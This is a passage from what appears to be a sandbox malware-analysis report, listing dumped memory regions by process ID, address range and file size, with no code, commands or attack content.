memory/8448-1500-0x0000019F95080000-0x0000019F95081000-memory.dmpFilesize
4KB
-
memory/8456-1028-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/8456-1040-0x0000000004EE0000-0x0000000004EE1000-memory.dmpFilesize
4KB
-
memory/8484-1076-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/8484-1099-0x0000000004E80000-0x0000000004E81000-memory.dmpFilesize
4KB
-
memory/8500-1048-0x0000000003141000-0x0000000003145000-memory.dmpFilesize
16KB
-
memory/8500-1050-0x00000000038F1000-0x00000000038F8000-memory.dmpFilesize
28KB
-
memory/8500-1051-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/8544-1722-0x0000024E01FE0000-0x0000024E01FE1000-memory.dmpFilesize
4KB
-
memory/8544-1719-0x0000024E002A0000-0x0000024E002A1000-memory.dmpFilesize
4KB
-
memory/8544-1717-0x0000024E00280000-0x0000024E00281000-memory.dmpFilesize
4KB
-
memory/8600-720-0x000000001C5B0000-0x000000001C5B2000-memory.dmpFilesize
8KB
-
memory/8600-715-0x00007FFB50C50000-0x00007FFB5163C000-memory.dmpFilesize
9.9MB
-
memory/8600-716-0x0000000000120000-0x0000000000121000-memory.dmpFilesize
4KB
-
memory/8628-984-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/8684-884-0x0000000004880000-0x00000000048D6000-memory.dmpFilesize
344KB
-
memory/8724-1027-0x000000001B9D0000-0x000000001B9D2000-memory.dmpFilesize
8KB
-
memory/8724-1024-0x00007FFB50C50000-0x00007FFB5163C000-memory.dmpFilesize
9.9MB
-
memory/8728-972-0x00000000025B0000-0x00000000025B1000-memory.dmpFilesize
4KB
-
memory/8744-805-0x00007FFB50C50000-0x00007FFB5163C000-memory.dmpFilesize
9.9MB
-
memory/8744-825-0x0000000001170000-0x0000000001172000-memory.dmpFilesize
8KB
-
memory/8784-800-0x0000000005380000-0x0000000005381000-memory.dmpFilesize
4KB
-
memory/8784-781-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/8808-931-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/8828-1647-0x000002C716590000-0x000002C716591000-memory.dmpFilesize
4KB
-
memory/8828-1643-0x000002C716530000-0x000002C716531000-memory.dmpFilesize
4KB
-
memory/8828-1639-0x000002C7162F0000-0x000002C7162F1000-memory.dmpFilesize
4KB
-
memory/8856-920-0x000002711B890000-0x000002711B891000-memory.dmpFilesize
4KB
-
memory/8856-922-0x000002711BA00000-0x000002711BA01000-memory.dmpFilesize
4KB
-
memory/8856-925-0x000002711B8B0000-0x000002711B8B1000-memory.dmpFilesize
4KB
-
memory/8868-771-0x00007FFB555B0000-0x00007FFB55F50000-memory.dmpFilesize
9.6MB
-
memory/8868-803-0x0000000001610000-0x0000000001612000-memory.dmpFilesize
8KB
-
memory/8920-705-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/8920-706-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/8920-712-0x00000000054A0000-0x00000000054A1000-memory.dmpFilesize
4KB
-
memory/8932-1128-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/8932-1143-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/8936-1479-0x0000015B74A80000-0x0000015B74A81000-memory.dmpFilesize
4KB
-
memory/9068-843-0x0000000002341000-0x0000000002345000-memory.dmpFilesize
16KB
-
memory/9148-1090-0x0000000001DE0000-0x0000000001DE1000-memory.dmpFilesize
4KB
-
memory/9160-1237-0x00000272BB8B0000-0x00000272BB8B1000-memory.dmpFilesize
4KB
-
memory/9276-1170-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB
-
memory/9276-1189-0x0000000005330000-0x0000000005331000-memory.dmpFilesize
4KB
-
memory/9352-1738-0x0000029342E70000-0x0000029342E71000-memory.dmpFilesize
4KB
-
memory/9352-1736-0x0000028B402C0000-0x0000028B402C1000-memory.dmpFilesize
4KB
-
memory/9352-1734-0x0000028B40280000-0x0000028B40281000-memory.dmpFilesize
4KB
-
memory/9420-1494-0x00007FFB50C50000-0x00007FFB5163C000-memory.dmpFilesize
9.9MB
-
memory/9420-1509-0x000000001B9C0000-0x000000001B9C2000-memory.dmpFilesize
8KB
-
memory/9464-1263-0x0000027DC3230000-0x0000027DC3231000-memory.dmpFilesize
4KB
-
memory/9492-1450-0x0000000002820000-0x0000000002821000-memory.dmpFilesize
4KB
-
memory/9508-1728-0x00000260899D0000-0x00000260899D1000-memory.dmpFilesize
4KB
-
memory/9508-1732-0x0000026089B50000-0x0000026089B51000-memory.dmpFilesize
4KB
-
memory/9508-1730-0x0000026089B20000-0x0000026089B21000-memory.dmpFilesize
4KB
-
memory/9700-1459-0x0000000000AC0000-0x0000000000AC1000-memory.dmpFilesize
4KB
-
memory/9700-1454-0x00007FFB50C50000-0x00007FFB5163C000-memory.dmpFilesize
9.9MB
-
memory/9700-1457-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/9700-1455-0x0000000000360000-0x0000000000361000-memory.dmpFilesize
4KB
-
memory/9700-1460-0x00000000024E0000-0x00000000024E2000-memory.dmpFilesize
8KB
-
memory/9700-1458-0x00000000024F0000-0x000000000252C000-memory.dmpFilesize
240KB
-
memory/9732-1511-0x000001A9D4D50000-0x000001A9D4D51000-memory.dmpFilesize
4KB
-
memory/9732-1508-0x000001A9D4AE0000-0x000001A9D4AE1000-memory.dmpFilesize
4KB
-
memory/9732-1514-0x000001A9D4D70000-0x000001A9D4D71000-memory.dmpFilesize
4KB
-
memory/9820-1481-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/9864-1192-0x0000029D86CE0000-0x0000029D86CE1000-memory.dmpFilesize
4KB
-
memory/9864-1194-0x0000029D86EF0000-0x0000029D86EF1000-memory.dmpFilesize
4KB
-
memory/9864-1196-0x0000029D86F70000-0x0000029D86F71000-memory.dmpFilesize
4KB
-
memory/9944-1461-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/10196-1480-0x000001A4D77C0000-0x000001A4D77C1000-memory.dmpFilesize
4KB
-
memory/10228-1222-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/10228-1213-0x0000000070850000-0x0000000070F3E000-memory.dmpFilesize
6.9MB